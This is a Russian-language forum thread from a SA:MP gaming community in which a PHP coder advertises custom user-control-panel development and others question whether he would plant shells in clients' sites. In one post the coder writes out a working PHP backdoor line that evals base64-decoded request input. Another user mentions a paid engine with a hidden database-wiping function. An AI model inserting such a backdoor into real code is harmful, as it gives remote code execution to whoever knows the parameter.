|
Разработка UCP, движков любой сложности!
|
|
| Sabotage | Дата: Четверг, 14.07.2011, 04:09 | Сообщение # 16 |
|
Долгожитель
Награды: 19
Замечания: 0%
Статус: 
| Quote (phpcoder) Sabotage, нет. Подучи - напишу
Игровые компьютеры GIGASPOT
|
| |
|
|
| Alcoholik | Дата: Четверг, 14.07.2011, 11:29 | Сообщение # 17 |
|
Мастер джэдай
Награды: 111
Статус: 
| Почищено.
if(isset($beer)&&isset($girl)) { drink($beer);fuck($girl); }else die(); Мониторинг sa:mp серверов Приватно никого не консультирую, моды также не пишу, ни так, ни за деньги. Моя ICQ 675715, пишу только с неё. Все остальные Роачи фейки, ничего я не продаю и продавать не буду, вас разводят.
|
| |
|
|
| _Dark_ | Дата: Четверг, 14.07.2011, 11:51 | Сообщение # 18 |
|
Постоялец
Награды: 4
Замечания: 40%
Статус: 
| А где гарантия, что ты в процессе написания UCP для какого-нибудь человека, не понимающего PHP, не вставишь туда шеллов? Где гарантия, что написанная твоя UCP будет супер-мего защищенная от всех возможных опасностей? Что если новичок не понимает всех сложностей PHP и MySQL и не поймет как ее установить? Что если тебе попадется занудливый заказчик, который постоянно будет требовать что-то изменить, доработать и т.д.? Ты будешь делать то, что он просит? Или руководствуешься по принципу "То что в начале не просил, в конце уже не будет"? А техническую поддержку пользователям предоставляете?
Если баги возникают из ниоткуда - ты на правильном пути. (с)
|
| |
|
|
| phpcoder | Дата: Четверг, 14.07.2011, 13:47 | Сообщение # 19 |
|
Уверенный в себе
Награды: 3
Статус: 
| Quote (_Dark_) А где гарантия, что ты в процессе написания UCP для какого-нибудь человека, не понимающего PHP, не вставишь туда шеллов? Зачем вставлять шелл человеку, который платит?
Quote (_Dark_) Где гарантия, что написанная твоя UCP будет супер-мего защищенная от всех возможных опасностей? Не существует "супер-мего защищенных" систем. Но я фильтрую все входящие данные от пользователя, что в принципе исключает взлом. (Естественно, если вам впарят трой и получат админку, то это уже совсем другая история)
Quote (_Dark_) Что если новичок не понимает всех сложностей PHP и MySQL и не поймет как ее установить? Чтобы установить php скрипт не нужно иметь никаких знаний в этой области. Открыть файл в текстовом редакторе, поменять то, что я скажу на свое (данные для подключения к базе данных и т.п.) не сложно. В любом случае я помогу установить скрипт, если у заказчика это вызывает затруднения.
Quote (_Dark_) Что если тебе попадется занудливый заказчик, который постоянно будет требовать что-то изменить, доработать и т.д.? Ты будешь делать то, что он просит? Или руководствуешься по принципу "То что в начале не просил, в конце уже не будет"? Руководствуюсь тех заданию. В принципе, если заказчик не перевернет все с ног на голову и не поменяет ТЗ кардинально, то перепишу так, как этого требует заказчик.
Quote (_Dark_) А техническую поддержку пользователям предоставляете? Да, в пределах разумного.
Покупаю RP/RPG сервера. Бюджет: 30 тыс. руб.
|
| |
|
|
| _Dark_ | Дата: Четверг, 14.07.2011, 20:25 | Сообщение # 20 |
|
Постоялец
Статус: 
| Quote (phpcoder) Зачем вставлять шелл человеку, который платит? LightMon Engine знаете? И он платный...
Quote (phpcoder) Чтобы установить php скрипт не нужно иметь никаких знаний в этой области. Открыть файл в текстовом редакторе, поменять то, что я скажу на свое (данные для подключения к базе данных и т.п.) не сложно. В любом случае я помогу установить скрипт, если у заказчика это вызывает затруднения. UCP наверно надо еще и с модом связать?
|
| |
|
|
| RоACh | Дата: Четверг, 14.07.2011, 21:35 | Сообщение # 21 |
|
Местный
Награды: 14
Замечания: 20%
Статус: 
| работа на заказ продается в одни руки. автор продает и забывает. ему уже по барабану у кого она будет стоять
Не бывает невыносимых людей,бывают узкие двери. ЛС не принимаю! Все ЛС сюда http://www.samp-rus.com/index/8-10438
|
| |
|
|
| phpcoder | Дата: Пятница, 15.07.2011, 03:10 | Сообщение # 22 |
|
Уверенный в себе
Статус: 
| Quote (_Dark_) LightMon Engine знаете? И он платный... Шеллы в нуллы обычно пихают. Либо если продают движок/модуль. А заказчикам нет смысла шеллы заливать.
Quote (_Dark_) UCP наверно надо еще и с модом связать? Вообще я и занимаюсь тем, что пишу UCP под мод заказчика.
|
| |
|
|
| _Dark_ | Дата: Пятница, 15.07.2011, 23:25 | Сообщение # 23 |
|
Постоялец
Статус: 
| Quote (phpcoder) Шеллы в нуллы обычно пихают. Либо если продают движок/модуль. А заказчикам нет смысла шеллы заливать. Вообще то как раз в офф версии Lightmon 2 (1650 руб.) была скрытая функция которая сносила БД и все файлы сайта. И как раз наоборот: невыгодно встраивать шелл в скрипт, который массово расходится. Узнают - пользоваться перестанут. А заказчику шелл встроить - проще простого. Потом докажи что это не клевета, а правда. Quote (phpcoder) Вообще я и занимаюсь тем, что пишу UCP под мод заказчика. А если вам откажутся давать мод?
Сообщение отредактировал _Dark_ - Пятница, 15.07.2011, 23:26 |
| |
|
|
| phpcoder | Дата: Пятница, 15.07.2011, 23:31 | Сообщение # 24 |
|
Уверенный в себе
Статус: 
| Quote (_Dark_) А если вам откажутся давать мод? Мне мод не нужен, мне нужна структура базы данных. И доступ к ней на время разработки.
Quote (_Dark_) Вообще то как раз в офф версии Lightmon 2 (1650 руб.) была скрытая функция которая сносила БД и все файлы сайта. И как раз наоборот: невыгодно встраивать шелл в скрипт, который массово расходится. Узнают - пользоваться перестанут. А заказчику шелл встроить - проще простого. Потом докажи что это не клевета, а правда. Выгодно сносить нуллы у тех, кто не покупал. Встроить то просто, в любой скрипт стоит воткнуть: Code if ( $_REQUEST['a'] ) eval( base64_decode( $_REQUEST['a'] ) ); Только смысл?
|
| |
|
|
| _Dark_ | Дата: Суббота, 16.07.2011, 15:13 | Сообщение # 25 |
|
Постоялец
Статус: 
| Quote (phpcoder) Мне мод не нужен, мне нужна структура базы данных. И доступ к ней на время разработки. Извините, вы наверно не так поняли. Я имею в виду, если у заказчика чистый мод. Без системы аккаунтом на MySQL и прочих наворотов. Т.е. обычный мод. Что тогда делать? Quote (phpcoder) Только смысл? Вы спрашиваете в чем смысл шелла?
Сообщение отредактировал _Dark_ - Суббота, 16.07.2011, 15:14 |
| |
|
|
| phpcoder | Дата: Суббота, 16.07.2011, 16:24 | Сообщение # 26 |
|
Уверенный в себе
Статус: 
| Переводить на MySQL. Либо, если аккаунты и прочая информация хранится в файлах, то без использования MySQL напишу.
Quote (_Dark_) Вы спрашиваете в чем смысл шелла? Я спрашиваю какой смысл заливать шелл заказчику? Выгоднее работать с человеком на постоянных условиях, а значит доступ к MySQL и/или FTP будет на время разработки, смысл шелла отпадает. Да и просто это как-то некультурно.
|
| |
|
|
| phpcoder | Дата: Среда, 20.07.2011, 23:10 | Сообщение # 27 |
|
Уверенный в себе
Статус: 
| UP __________________
|
| |
|
|
| Alcoholik | Дата: Вторник, 26.07.2011, 08:45 | Сообщение # 28 |
|
Мастер джэдай
Статус: 
| Отличный кодер, цены не с неба взяты, а из-за реальных знаний, которые у ТС имеются
if(isset($beer)&&isset($girl)) { drink($beer);fuck($girl); }else die(); Мониторинг sa:mp серверов Приватно никого не консультирую, моды также не пишу, ни так, ни за деньги. Моя ICQ 675715, пишу только с неё. Все остальные Роачи фейки, ничего я не продаю и продавать не буду, вас разводят.
|
| |
|
|
| Fus1 | Дата: Среда, 27.07.2011, 00:51 | Сообщение # 29 |
|
Награды: 121
Статус: 
| на Flash - UCP реально написать?
|
| |
|
|
| Alcoholik | Дата: Среда, 27.07.2011, 00:58 | Сообщение # 30 |
|
Мастер джэдай
Статус: 
| на сколько я знаю только если извлекать из xml информацию, может как то и можно)
|
| |
|
|